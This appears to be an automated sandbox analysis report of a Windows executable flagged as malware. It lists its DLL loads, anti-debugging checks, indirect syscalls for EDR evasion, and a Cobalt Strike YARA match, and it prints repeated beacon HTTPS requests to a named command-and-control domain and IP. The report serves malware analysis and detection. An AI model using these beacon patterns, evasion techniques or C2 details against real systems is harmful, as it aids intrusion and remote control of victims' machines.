Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static file information: File size 3636736 > 1048576

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x211c00

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: More than 200 imports for USER32.dll

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

PE file contains an invalid checksum

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Static PE information: real checksum: 0x33725e should be: 0x3790fb

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401350C1 push rcx; ret

0_2_00000001401350C2

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,	0_2_0000000140104C7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,	0_2_0000000140104C7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140044F34 IsIconic,	0_2_0000000140044F34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400B1740 GetParent,IsIconic,GetParent,GetDlgCtrlID,	0_2_00000001400B1740
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140105A3C IsIconic,	0_2_0000000140105A3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_0000000140099CE8 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,GetParent,SendMessageW,UpdateWindow,GetParent,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	0_2_0000000140099CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_00000001400C5D9C IsWindowVisible,IsIconic,	0_2_00000001400C5D9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013DFAC IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,	0_2_000000014013DFAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Code function: 0_2_000000014013E2CC IsIconic,PostMessageW,	0_2_000000014013E2CC

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401CDB40 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00000001401CDB40

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

API coverage: 1.5 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

0_2_000000014003C388

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004DB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_3_01FC4060 LdrLoadDll,

0_3_01FC4060

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000001401D83C4

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401CC9B0 GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_00000001401CC9B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014000E540 GetProcessHeap,_Init_thread_footer,_Init_thread_footer,

0_2_000000014000E540

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000001401D83C4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtResumeThread: Indirect: 0x20A4F90	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A3ACA	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtAllocateVirtualMemory: Indirect: 0x1FC0185	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtCreateThreadEx: Indirect: 0x20A6602	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A6953	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtResumeThread: Indirect: 0x20A66ED	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSuspendThread: Indirect: 0x20A4E8C	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A3D44	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtSetContextThread: Indirect: 0x20A66D8	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtCreateThreadEx: Indirect: 0x20A686D	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtAllocateVirtualMemory: Indirect: 0x1FC0249	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	NtProtectVirtualMemory: Indirect: 0x1FC0887	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Thread register set: 6516 40

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001402009C0 AllocateAndInitializeSid,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,MakeSelfRelativeSD,GetLastError,LocalAlloc,MakeSelfRelativeSD,LocalFree,LocalFree,FreeSid,

0_2_00000001402009C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

0_2_00000001402009C0

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: try_get_function,GetLocaleInfoW,

0_2_00000001401EFFE4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_00000001401F0068 try_get_function,GetSystemTimeAsFileTime,

0_2_00000001401F0068

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,

0_2_0000000140054158

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
89.150.57.46	easthoolbook.com	Italy		39356	AVANTI-UK-ASGB	true

Contacted Domains

Name	IP	Active
easthoolbook.com	89.150.57.46	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://easthoolbook.com/sign.mpeg?dare=true	false		unknown
easthoolbook.com	true		unknown

AV Detection

Found malware configuration

Source: 00000000.00000003.2073190217.000000000208E000.00000004.00001000.00020000.00000000.sdmp

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

ReversingLabs: Detection: 25%

Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2

Source:

Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Code function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

0_2_000000014003C388

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: easthoolbook.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AVANTI-UK-ASGB AVANTI-UK-ASGB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
